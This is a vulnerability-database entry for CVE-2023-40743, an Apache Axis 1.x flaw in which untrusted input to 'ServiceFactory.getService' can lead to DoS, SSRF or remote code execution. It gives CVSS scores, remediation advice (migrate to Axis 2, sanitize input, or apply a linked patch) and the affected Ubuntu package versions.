Lucene search

K
ubuntucveUbuntu.comUB:CVE-2023-40743
HistorySep 05, 2023 - 12:00 a.m.

CVE-2023-40743

2023-09-0500:00:00
ubuntu.com
ubuntu.com
17
apache axis
security vulnerability
servicefactorygetservice
dos
ssrf
rce
eol
apache axis 2/java
untrusted input
patch
bug report

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.003

Percentile

69.6%

UNSUPPORTED WHEN ASSIGNED When integrating Apache Axis 1.x in an
application, it may not have been obvious that looking up a service through
“ServiceFactory.getService” allows potentially dangerous lookup mechanisms
such as LDAP. When passing untrusted input to this API method, this could
expose the application to DoS, SSRF and even attacks leading to RCE. As
Axis 1 has been EOL we recommend you migrate to a different SOAP engine,
such as Apache Axis 2/Java. As a workaround, you may review your code to
verify no untrusted or unsanitized input is passed to
“ServiceFactory.getService”, or by applying the patch from
https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210
. The Apache Axis project does not expect to create an Axis 1.x release
fixing this problem, though contributors that would like to work towards
this are welcome.

Bugs

OSVersionArchitecturePackageVersionFilename
ubuntu18.04noarchaxis< 1.4-25ubuntu0.1~esm1UNKNOWN
ubuntu20.04noarchaxis< 1.4-28+deb10u1build0.20.04.1UNKNOWN
ubuntu22.04noarchaxis< 1.4-28+deb10u1build0.22.04.1UNKNOWN
ubuntu23.04noarchaxis< 1.4-28+deb10u1build0.23.04.1UNKNOWN
ubuntu23.10noarchaxis< 1.4-28+deb10u1build0.23.10.1UNKNOWN
ubuntu16.04noarchaxis< 1.4-24ubuntu0.1~esm1UNKNOWN

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.003

Percentile

69.6%